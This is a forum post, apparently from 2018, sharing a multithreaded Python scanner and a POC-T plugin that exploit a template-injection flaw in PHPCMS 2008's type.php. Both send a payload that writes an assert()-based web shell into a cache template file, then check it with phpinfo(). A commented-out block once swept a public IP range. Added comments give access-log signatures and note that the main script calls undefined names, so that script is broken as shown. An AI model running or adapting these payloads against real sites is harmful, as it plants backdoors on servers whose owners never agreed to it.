本帖最后由 leishao123 于 2018-12-9 23:35 编辑
测试环境windows10+Python3.7
本地搭建测试没问题
原本这脚本在漏洞出的那天就写好提交了,管理员到现在才回复,因为忙吧。。
import queue
import threading
import requests
import sys
def payload(url):
# Check one target for the type.php template issue this post is about.
# url: base URL of the target; the two fixed paths below are appended to it as-is.
# Returns nothing; on a confirmed hit it prints the verification URL and appends
# the target to sccess.txt.
# Defender note: both request paths are constant strings, so they are usable
# access-log signatures: a GET to type.php whose template= value carries PHP
# code, followed shortly by a GET of /data/cache_template/rss.tpl.php.
payload_url = """/type.php?template=tag_(){};@unlink(FILE);assert($_GET[1]);{//../rss"""
validation = """/data/cache_template/rss.tpl.php?1=phpinfo()"""
try:
# A 200 on the first request alone proves nothing; confirmation is the
# phpinfo() title appearing in the response of the second request.
requests_strus = requests.get(url+payload_url,timeout = 5).status_code
if requests_strus == 200:
# Unlike the first request, this one has no timeout set.
requests_validation = requests.get(url+validation).text
if '<title>phpinfo()</title>'in requests_validation:
print(url+validation)
# The file handle is never explicitly closed; it relies on the interpreter to close it.
open('sccess.txt','a').write(url+'\n')
except:
# Bare except: every error (timeouts, connection failures, even KeyboardInterrupt)
# collapses into the same '[-]' line, so failures are indistinguishable.
print('[-]'+url)
pass
def q_put():
# Fill the module-global queue q with one stripped line per entry of the
# file named by sys.argv[1]. q itself is created only in the __main__ block.
# The commented-out block below is an earlier, hard-coded input mode.
# for i in range(1,255):
# for i_2 in range(1, 255):
# s = '61.134.'+str(i)+'.'+str(i_2)
# q.put(s)
# Opened without a context manager and never explicitly closed.
file = open(str(sys.argv[1]), 'r')
for i in file:
s = i.strip()
q.put(s)
def q_get():
# Worker body run by each thread: take entries from the global queue q until it is empty.
# requests_json is not defined anywhere in this listing.
while not q.empty():
ip = q.get()
requests_json(ip)
def main():
# Load the queue, start 30 q_get worker threads, and wait for all of them.
# threads is not defined anywhere in this listing.
q_put()
for i in range(30):
threads.append(threading.Thread(target=q_get))
for t in threads:
t.start()
for t in threads:
t.join()
if __name__ == "__main__":
# q is created here as a module global; q_put and q_get look it up by name.
q = queue.Queue()
main()
#payload('http://127.0.0.1:8080/phpcms2008sp4_utf8_111122/')
另外还有一个POC-T的插件
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import requests
def poc(url):
# POC-T style single-target check for the same type.php template issue.
# url: host or URL; 'http://' is prepended when no scheme is present.
# Returns the normalized url on a confirmed hit, otherwise False (any exception
# raised by the requests is also mapped to False).
url = url if '://' in url else 'http://' + url
payload_url = """/type.php?template=tag_(){};@unlink(FILE);assert($_GET[1]);{//../rss"""
validation = """/data/cache_template/rss.tpl.php?1=phpinfo()"""
try:
# Confirmation is the phpinfo() title in the second response, not the 200 on the first.
requests_strus = requests.get(url+payload_url,timeout = 5).status_code
if requests_strus == 200:
# No timeout on this second request.
requests_validation = requests.get(url+validation).text
if '<title>phpinfo()</title>'in requests_validation:
return url
except Exception:
return False
return False
#print(poc('http://127.0.0.1:8080/phpcms2008sp4_utf8_111122/'))